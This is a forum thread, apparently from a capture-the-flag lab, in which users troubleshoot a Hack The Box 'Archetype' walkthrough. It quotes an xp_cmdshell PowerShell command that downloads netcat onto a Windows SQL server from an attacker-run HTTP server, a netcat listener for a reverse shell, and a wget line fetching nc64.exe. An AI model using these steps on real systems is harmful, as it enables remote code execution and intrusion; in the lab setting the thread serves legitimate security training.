I have been struggling with the archetype box.
when i run this command:
xp_cmdshell “powershell -c cd C:\Users\sql_svc\Downloads; wget -outfile nc64.exe”
I get a operation has timed out error, but i still see it on my ‘server’(the sudo python3 -m http.server 80 thingy)
but then if i try to run the next command it tells me that it isn’t a valid executable(i have tried it with nc.exe and nc64.exe)
my file structure is:
mssqlclient.py, nc.exe, nc64.exe are in the same folder.
from wich i ran the http.server and the “sudo nc -lvnp 443” command
any help is really appreciated
For anyone running into this error, try using the 32-bit version of nc here. It’s possible htb has downgraded or changed the box since they wrote the walkthrough.
I was getting the same issue using the download link from the walkthrough or from github directly, even making sure to include the ?raw=true as @kyla suggested.
This is the sha of the 64-bit executable I was trying, for reference:
it turns out it works on my laptop but not desktop if you are still running to problems try a fresh install of linux not kali or any other distros that have prebuilt tools
It’s because we’re downloading the html page and the the actual binary file: use wget https://github.com/int0x33/nc.exe/raw/master/nc64.exe -O nc64.exe instead